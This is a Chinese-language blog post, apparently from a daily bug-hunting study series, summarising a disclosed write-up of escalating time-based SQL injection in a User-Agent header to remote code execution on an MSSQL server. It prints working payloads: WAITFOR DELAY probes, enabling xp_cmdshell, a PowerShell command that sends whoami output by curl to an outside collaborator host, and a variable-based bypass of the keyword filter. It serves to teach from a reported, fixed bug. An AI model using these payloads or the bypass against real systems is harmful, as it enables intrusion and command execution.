365DaysOfHacking

漏洞挖掘365天挑战——Day077:漏洞报告学习之How I Escalated a Time-Based SQL Injection to RCE

P小二一条评论

链接:https://infosecwriteups.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398

作者在侦查阶段使用sublist3r来查找子域的时候,发现效果都不好,就换成了amass。

然后找到了一个special.target.com 的子域名,然后打开看,像是一个管理面板

然后进行username=123’&password=123′ 来测试sql注入

然后得到了一个500 err的页面,

发现没有关闭调试模式,得到了完整的查询路径和文件路径

然后再次在User-Agent上测试sql注入

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36‘–

然后检查基于时间的注入

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36‘;WAITFOR DELAY ‘00:00:05’;–

发现被延迟了,成功了。

将SQL注入升级为RCE

然后他就可以用xp _ cmdshell 执行命令了

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36‘; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;–

然后用ping来测试RCE

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36‘; EXEC xp_cmdshell ‘ping myburpcollablink.burpcollaborator.net’;–

然后说明可以RCE

最终的RCE payload:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36‘;EXEC xp_cmdshell ‘powershell -c “$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x“‘;–

他报告了漏洞,sony修复了,但是后面还被绕过了。

绕过方法如下:

sony只是过滤了关键词 EXEC xp_cmdshell

作者就声明一个变量,绕过了

‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —

漏洞挖掘365天挑战——Day077:漏洞报告学习之How I Escalated a Time-Based SQL Injection to RCE”的一个响应

发表评论

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com 徽标

您正在使用您的 WordPress.com 账号评论。 注销 /  更改 )

Facebook photo

您正在使用您的 Facebook 账号评论。 注销 /  更改 )

取消

Connecting to %s